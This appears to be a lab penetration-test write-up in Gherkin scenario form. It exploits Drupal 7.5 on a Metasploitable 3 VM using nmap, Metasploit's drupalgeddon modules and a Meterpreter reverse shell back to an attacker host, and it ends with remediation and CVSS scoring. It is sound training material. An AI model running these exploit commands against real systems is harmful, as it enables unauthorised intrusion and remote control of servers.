## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 3
  Location:
    10.0.0.236:80 TCP
  CWE:
    CWE-0937: Using Components with Known Vulnerabilities:
      https://cwe.mitre.org/data/definitions/937.html
  Rule:
    REQ.262: Verify third-party components
  Goal:
    Achieve a user session to the machine
  Recommendation:
    Update software when critical fixes are available

  Background:
  Hacker's software:
    | <Software name>        | <Version>   |
    | Kali GNU/Linux Rolling | 2020.2a     |
    | Nmap                   | 7.80        |
    | Metasploit             | 5.0.87-dev  |
    | Firefox                | 68.7.0esr   |

  TOE information:
    Given I am running a Metasploitable3 Ubuntu VM at
    """
    10.0.0.236
    """

  Scenario: Normal use case
    Given I am allowed to access the Drupal server
    When I enter the Credentials
    Then I am able to use Drupal

  Scenario: Static detection
    Given I'm aiming to exploit a Drupal server
    When I don't have access to files in the VM or valid username and password
    Then I realize it is not possible to make a static exploitation

  Scenario: Dynamic detection
    Given I scan the target machine
    When I scan open ports with
    """
    $ nmap -p0- 10.0.0.236
    """
    Then I get the following output:
    """
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 09:08 EDT
    Host is up (0.0014s latency).
    Not shown: 65526 filtered ports
    PORT     STATE  SERVICE
    21/tcp   open   ftp
    22/tcp   open   ssh
    80/tcp   open   http
    445/tcp  open   microsoft-ds
    631/tcp  open   ipp
    3000/tcp closed ppp
    3306/tcp open   mysql
    3500/tcp open   rtmp-port
    6697/tcp open   ircs-u
    8181/tcp open   intermapper

    Nmap done: 1 IP address (1 host up) scanned in 109.14 seconds
    """
    And I found that the default web port is opened
    """
    80/tcp   open   http
    """
    Then I enter to
    """
    http://10.0.0.236/
    """
    And I see 3 folders and 1 file
    """
    /chat /drupal /phpmyadmin and payroll_app.php
    """
    When I click the folder
    """
    drupal
    """
    Then The Drupal login form appears
    And I can confirm that the Drupal service is running
    When I search how to find out the Drupal version
    Then I found out that there should be an ".info" file in
    """
    drupal/modules/blog/
    """
    And I enter in
    """
    http://10.0.0.236/drupal/modules/blog/
    """
    And I found 5 files
    """
    blog.info blog.install blog.module blog.pages.inc blog.test
    """
    When I open
    """
    blog.info
    """
    Then I see the following
    """
    name = Blog
    description = Enables multi-user blogs.
    package = Core
    version = VERSION
    core = 7.x
    files[] = blog.test

    ; Information added by drupal.org packaging script on 2011-07-27
    version = "7.5"
    project = "drupal"
    datestamp = "1311798415"
    """
    And I can confirm that the Drupal version running in the target is
    """
    7.5
    """
    And I found that there are some Vulnerabilities for that version
    """
    https://www.cvedetails.com/cve/CVE-2018-7600/
    https://www.cvedetails.com/cve/CVE-2012-4554/
    """

  Scenario: Exploitation
    Given The machine with Drupal Service running version
    """
    7.5
    """
    When I use Metasploit, I found the following exploits for Drupal
    """
    exploit/unix/webapp/drupal_drupalgeddon2
    exploit/multi/http/drupal_drupageddon
    auxiliary/scanner/http/drupal_views_user_enum
    exploit/unix/webapp/drupal_coder_exec
    exploit/unix/webapp/drupal_restws_exec
    exploit/unix/webapp/drupal_restws_unserialize
    exploit/unix/webapp/generic_exec
    """
    Then I select the first one
    Given That exploit, I select it in Metasploit
    """
    msf5 > exploit/unix/webapp/drupal_drupalgeddon2
    """
    Then I procede to check out the options needed to execute it, with
    """
    exploit(unix/webapp/drupal_drupalgeddon2) > show options

    Module options (exploit/unix/webapp/drupal_drupalgeddon2):

      Name         Current Setting  Required  Description
      ----         ---------------  --------  -----------
      DUMP_OUTPUT  false            no        Dump payload command output
      PHP_FUNC     passthru         yes       PHP function to execute
      Proxies                       no        A proxy chain of format type:h...
      RHOSTS                        yes       The target host(s), range CIDR...
      RPORT        80               yes       The target port (TCP)
      SSL          false            no        Negotiate SSL/TLS for outgoing...
      TARGETURI    /                yes       Path to Drupal install
      VHOST                         no        HTTP server virtual host

    Exploit target:

      Id  Name
      --  ----
      0   Automatic (PHP In-Memory)

    """
    And I Found that I have all the required options
    When I procede to introduce all the required options
    """
    msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.0.0.236
    RHOSTS => 10.0.0.236
    msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal/
    TARGETURI => /drupal/
    """
    Then I get no errors
    And I procede to execute the exploit with the default payload
    """
    msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

    [*] Started reverse TCP handler on 10.0.0.233:4444
    [*] Exploit completed, but no session was created.

    """
    Given That result
    When I check out if the target is vulnerable, I get
    """
    msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check
    [*] 10.0.0.236:80 - The target appears to be vulnerable.
    """
    Then I use another payload
    """
    msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload
    php/reverse_perl
    payload => php/reverse_perl
    msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.0.0.233
    LHOST => 10.0.0.233
    msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
    [*] Started reverse TCP handler on 10.0.0.233:4444
    [*] Exploit completed, but no session was created.
    """
    And I decide to use another exploit
    """
    exploit/multi/http/drupal_drupageddon
    """
    When I select the exploit and introduce the requiered information
    """
    msf5 > use exploit/multi/http/drupal_drupageddon
    msf5 exploit(multi/http/drupal_drupageddon) > set RHOSTS 10.0.0.236
    RHOSTS => 10.0.0.236
    msf5 exploit(multi/http/drupal_drupageddon) > set TARGETURI /drupal/
    TARGETURI => /drupal/
    """
    Then I execute the exploit and get
    """
    msf5 exploit(multi/http/drupal_drupageddon) > exploit

    [*] Started reverse TCP handler on 10.0.0.233:4444
    [*] Sending stage (38288 bytes) to 10.0.0.236
    [*] Meterpreter session 1 opened (10.0.0.233:4444 -> 10.0.0.236:37319)
    at 2020-07-24 10:34:24 -0400
    meterpreter >
    """
    And I procede to confirm if I am in the system
    """
    meterpreter > pwd
    /var/www/html/drupal
    meterpreter > cd /
    meterpreter > ls
    Listing: /
    ==========

    Mode              Size      Type  Last modified              Name
    ----              ----      ----  -------------              ----
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:19:18 -0400  bin
    40755/rwxr-xr-x   1024      dir   2018-07-29 09:06:48 -0400  boot
    40755/rwxr-xr-x   3980      dir   2020-07-24 09:04:00 -0400  dev
    40755/rwxr-xr-x   4096      dir   2020-07-24 09:03:59 -0400  etc
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:07:28 -0400  home
    100644/rw-r--r--  24415077  fil   2018-07-29 09:06:48 -0400  initrd.img
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:05:59 -0400  lib
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:05:39 -0400  lib64
    40700/rwx------   16384     dir   2018-07-29 09:20:25 -0400  lost+found
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:03:25 -0400  media
    40755/rwxr-xr-x   4096      dir   2014-04-10 18:12:14 -0400  mnt
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:18:49 -0400  node_modules
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:20:18 -0400  opt
    40555/r-xr-xr-x   0         dir   2020-07-24 09:03:38 -0400  proc
    40700/rwx------   4096      dir   2018-07-29 09:09:20 -0400  root
    40755/rwxr-xr-x   860       dir   2020-07-24 09:07:21 -0400  run
    40755/rwxr-xr-x   12288     dir   2018-07-29 09:06:53 -0400  sbin
    40755/rwxr-xr-x   4096      dir   2014-04-16 17:02:45 -0400  srv
    40555/r-xr-xr-x   0         dir   2020-07-24 09:03:33 -0400  sys
    41777/rwxrwxrwx   4096      dir   2020-07-24 10:17:01 -0400  tmp
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:18:46 -0400  usr
    40755/rwxr-xr-x   4096      dir   2018-07-29 09:09:27 -0400  var
    100600/rw-------  5777056   fil   2014-04-10 16:11:23 -0400  vmlinuz
    """
    And I conclude that I am in the system

  Scenario: Remediation
    Given The Drupal server is not up to date
    When I check how to Update the version, I Found
    """
    https://www.drupal.org/docs/updating-drupal/migrate-composer-
    project-for-drupal-earlier-than-880
    """
    Then I delete from the Drupal folder, the following file
    """
    composer.lock
    """
    And I execute the following commands
    """
    $ composer update
    $ git add composer.lock; git commit
    $ composer remove webflo/drupal-core-strict --no-update
    $ composer remove drupal/core --no-update
    $ composer require 'composer/installers:^1.7' --no-update
    $ rm composer.lock
    $ rm -rf vendor
    $ composer require drupal/core-recommended:^8.8 --update-with-dependencies
    $ git add composer.json composer.lock;
    git commit -m "Update Drupal to 8.8.0 and use drupal/core-recommended
    instead of webflo/drupal-core-strict"
    $ composer remove --dev webflo/drupal-core-require-dev
    $ composer require --dev drupal/core-dev
    $ drush updb
    $ drush cr
    $ drush config-export
    """
    And I update the "settings.php" sync directory to
    """
    $settings['config_sync_directory'] = 'var/www/http';
    """
    When no errors where found running those commands
    Then Drupal database and schemas are now correct and I can update doing
    """
    $ composer install --no-dev drupal/core-recommended --with-dependencies
    $ drush updatedb
    $ drush cache:rebuild
    """
    And now Drupal is updated
    Given The updated Drupal server
    When I try to use the same exploit, I get
    """
    msf5 exploit(multi/http/drupal_drupageddon) > exploit
    [*] 10.0.0.236:80 - The target is not exploitable.
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.3/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.0/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.1/10 (Medium) - CR:M/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-07-24
